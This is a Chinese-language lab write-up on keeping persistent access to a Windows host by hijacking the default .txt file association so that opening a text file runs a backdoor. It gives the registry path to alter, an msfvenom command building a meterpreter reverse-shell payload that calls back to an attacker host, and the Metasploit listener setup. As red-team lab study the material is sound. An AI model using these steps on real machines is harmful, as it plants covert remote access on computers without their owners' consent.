返回首页
EN
H7 / SECURITY RESEARCH NOTES

通过默认文件关联执行后门程序实现权限维持

环境说明

IPHOSTNAMENOTE
172.16.106.67kali_dqy攻击者主机
10.10.10.88win10_dqy受害者主机

前言

  • 默认文件关联是后渗透权限维持技术中的一种,其将一种类型的文件与一个可以打开它的程序建立依赖关系,一个文件可以与多个应用程序关联。
  • 举个例子,比如我们要打开.txt后缀的文件,那么Windows上默认打开.txt后缀文件的程序是记事本(即Notepad.exe),那么我们通过将Notepad.exe替换成我们的后门程序,那么当打开.txt后缀文件的时候,就会执行我们的后门程序,进而实现权限维持。

复现过程

查看文件类型关联的程序

  • 可以通过assoc命令查看不同后缀文件所关联的文件类型,比如查看.txt后缀文件所关联的文件类型。
assoc .txt

  • 从上图得知.txt后缀文件关联的文件类型为txtfile,我们可以通过ftype命令查看打开该文件类型的应用程序
ftype txtfile

修改文件类型关联的程序

  • 我们可以在注册表中找到打开txtfile的程序,注册表编辑器输入以下路径即可:
HKCR\txtfile\shell\open\command

  • 其中txtfile是可以替换的,根据assoc命令结果的文件类型来进行替换,可以查看不同的应用程序。

  • 修改前记得先将注册表值进行备份,然后再修改为我们后门程序的路径。

MSF监听上线

  • MSF后门程序生成命令如下:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=172.16.106.67 LPORT=2335 -f exe > attack_demo.exe
  • 开启监听2335端口
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 172.16.106.67
set lport 2335
exploit
  • 如下图:

  • 此时我们打开受害者主机上的.txt后缀文件,如下图,目标主机上线